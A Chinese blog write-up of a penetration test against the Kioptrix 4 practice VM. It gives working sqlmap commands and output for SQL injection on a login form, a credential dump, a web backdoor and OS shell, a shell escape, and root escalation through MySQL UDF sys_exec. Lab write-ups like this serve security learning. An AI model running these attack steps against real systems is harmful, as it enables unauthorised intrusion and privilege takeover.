Kioptrix 4靶机

简介:emmmmm,为了实验满分,记录一次web靶机的渗透流程,非常感谢JKding233大佬的技术支持,给大佬跪了!!!

a

1. Kioptrix 4靶机

1.1 主机发现

1
netdiscover -r 192.168.7.0/24

1

1
2
主机IP:192.168.7.37
MAC:00:0c:29:4a:20:9b

1.2 端口探测

1
nmap -sV 192.168.7.37

2

1
2
3
4
5
nmap扫描主机,开启了2280139445端口
OpenSSH版本:4.7p1
Apache版本:2.2.8
PHP版本:5.2.4-2
操作系统:Ubuntun

1.3 SQL注入测试

SQL注入测试

1
访问web页面,弱口令登陆失败(admin;password)

3

1
查看提交的表单,使用post提交表单,尝试SQL注入

4

5

1
存在SQL注入,且暴露了网站物理路径

列出当前用户、数据库、当前用户是否是dba

1
2
3
使用sqlmap进行注入

sqlmap -u http://192.168.7.37/checklogin.php --data="myusername=admin&mypassword=password&Submit=Login" -p mypassword --current-user --current-db --is-dba
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
root@root:~# sqlmap -u http://192.168.7.37/checklogin.php --data="myusername=admin&mypassword=password&Submit=Login" -p mypassword --current-user --current-db --is-dba
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.4#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:32:13 /2020-11-17/

[14:32:13] [INFO] testing connection to the target URL
[14:32:13] [INFO] heuristics detected web page charset 'ascii'
[14:32:13] [INFO] testing if the target URL content is stable
[14:32:14] [INFO] target URL content is stable
[14:32:14] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL')
[14:32:14] [INFO] testing for SQL injection on POST parameter 'mypassword'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[14:32:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:32:21] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:32:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[14:32:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
sqlmap got a 302 redirect to 'http://192.168.7.37:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
[14:32:33] [INFO] POST parameter 'mypassword' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --code=302)
[14:32:33] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[14:32:33] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[14:32:33] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[14:32:33] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[14:32:33] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[14:32:33] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[14:32:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:32:33] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:32:33] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:32:33] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:32:33] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[14:32:33] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[14:32:33] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:32:33] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[14:32:33] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[14:32:33] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[14:32:33] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[14:32:33] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[14:32:33] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[14:32:33] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[14:32:33] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[14:32:33] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[14:32:33] [INFO] testing 'MySQL inline queries'
[14:32:33] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[14:32:33] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[14:32:33] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:32:33] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[14:32:33] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[14:32:33] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[14:32:33] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[14:32:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[14:32:33] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[14:32:57] [INFO] POST parameter 'mypassword' appears to be 'MySQL >= 5.0.12 OR time-based blind' injectable 
[14:32:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:32:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[14:32:57] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:32:57] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[14:33:08] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[14:33:08] [INFO] testing 'MySQL UNION query (34) - 21 to 40 columns'
[14:33:08] [INFO] testing 'MySQL UNION query (34) - 41 to 60 columns'
[14:33:08] [INFO] testing 'MySQL UNION query (34) - 61 to 80 columns'
[14:33:08] [INFO] testing 'MySQL UNION query (34) - 81 to 100 columns'
[14:33:08] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[14:33:08] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 220 HTTP(s) requests:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-1279' OR 8649=8649#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=admin&mypassword=password' OR SLEEP(5)-- dcjB&Submit=Login
---
[14:33:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[14:33:17] [INFO] fetching current user
[14:33:17] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:33:17] [INFO] retrieved: root@localhost
current user: 'root@localhost'
[14:33:17] [INFO] fetching current database
[14:33:17] [INFO] retrieved: members
current database: 'members'
[14:33:17] [INFO] testing if current user is DBA
[14:33:17] [INFO] fetching current user
current user is DBA: True
[14:33:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.7.37'

[*] ending @ 14:33:17 /2020-11-17/

列出数据库中的表

1
root@root:~# sqlmap -u http://192.168.7.37/checklogin.php --data="myusername=admin&mypassword=password&Submit=Login" -p mypassword --tables -D "members"

6

列出表的所有字段

1
root@root:~# sqlmap -u http://192.168.7.37/checklogin.php --data="myusername=admin&mypassword=password&Submit=Login" -p mypassword --columns -T "members" -D "members"

7

爆库

1
root@root:~# sqlmap -u http://192.168.7.37/checklogin.php --data="myusername=admin&mypassword=password&Submit=Login" -p mypassword --dump-all -T "members" -D "members"

8

1
2
3
用户名和密码
john     | MyNameIsJohn          |
robert   | ADGAdsafdfwt4gadfga== |

利用sqlmap写shell得到数据库名和密码

1
root@root:~# sqlmap -u http://192.168.7.37/checklogin.php --data="myusername=admin&mypassword=password&Submit=Login" -p mypassword --os-shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
root@root:~# sqlmap -u http://192.168.7.37/checklogin.php --data="myusername=admin&mypassword=password&Submit=Login" -p mypassword --os-shell
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.4#stable}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:48:55 /2020-11-17/

[14:48:55] [INFO] resuming back-end DBMS 'mysql' 
[14:48:55] [INFO] testing connection to the target URL
[14:48:55] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-1279' OR 8649=8649#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=admin&mypassword=password' OR SLEEP(5)-- dcjB&Submit=Login
---
[14:48:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[14:48:55] [INFO] going to use a web backdoor for command prompt
[14:48:55] [INFO] fingerprinting the back-end DBMS operating system
[14:48:56] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[14:48:59] [INFO] retrieved the web server document root: '/var/www'
[14:48:59] [INFO] retrieved web server absolute paths: '/var/www/checklogin.php'
[14:48:59] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[14:48:59] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://192.168.7.37:80/tmpupmtu.php
[14:48:59] [WARNING] unable to upload the file through the web file stager to '/var/www/'
[14:48:59] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] y
[14:49:01] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://192.168.7.37:80/tmpbyofn.php
[14:49:01] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'www-data'
os-shell> ls
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
checklogin.php
database.sql
images
index.php
john
login_success.php
logout.php
member.php
robert
tmpbcfsd.php
tmpbyofn.php
tmpugspy.php
tmpupmtu.php
---
os-shell> cat checklogin.php
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

1
mysql数据库用户名root,密码为空

使用获取的用户名和密码尝试ssh连接

1
password	MyNameIsJohn

9

使用shell命令得到一个bash交互shell

1
echo os.system('/bin/bash')

10

1.4 UDF提权

1
whereis lib_mysqludf_sys.so

11

1
2
3
4
5
6
mysql -u root -p

use mysql;

select sys_exec('id > /tmp/out; chown john.john /tmp/out');

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
john@Kioptrix4:~$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 6109
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select sys_exec('id > /tmp/out; chown john.john /tmp/out');
+-----------------------------------------------------+
| sys_exec('id > /tmp/out; chown john.john /tmp/out') |
+-----------------------------------------------------+
| NULL                                                | 
+-----------------------------------------------------+
1 row in set (0.04 sec)

mysql> quit
Bye
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=115(admin),1001(john)
john@Kioptrix4:~$ cat /tmp/out
uid=0(root) gid=0(root)

提权为root

1
2
3
4
5
6
7
8
mysql> select sys_exec('usermod -a -G admin john');
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.02 sec)

1
2
3
4
5
6
7
8
9
john@Kioptrix4:~$ sudo su
[sudo] password for john: 
root@Kioptrix4:/home/john# cd /
root@Kioptrix4:/# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/# 
root@Kioptrix4:/# whoami
root

12

2. 参考链接

https://blog.csdn.net/b10d9/article/details/108903874

https://www.cnblogs.com/hzcya1995/p/13302343.html

https://www.cnblogs.com/litlife/p/9030673.html#commentform

本文作者: foxcookie
发布时间: 2020-11-16
最后更新: 2022-12-14
本文标题: Kioptrix 4靶机
本文链接: https://foxcookie.github.io/2020/11/16/Kioptrix-4靶机/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明出处!

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

歪比巴卜?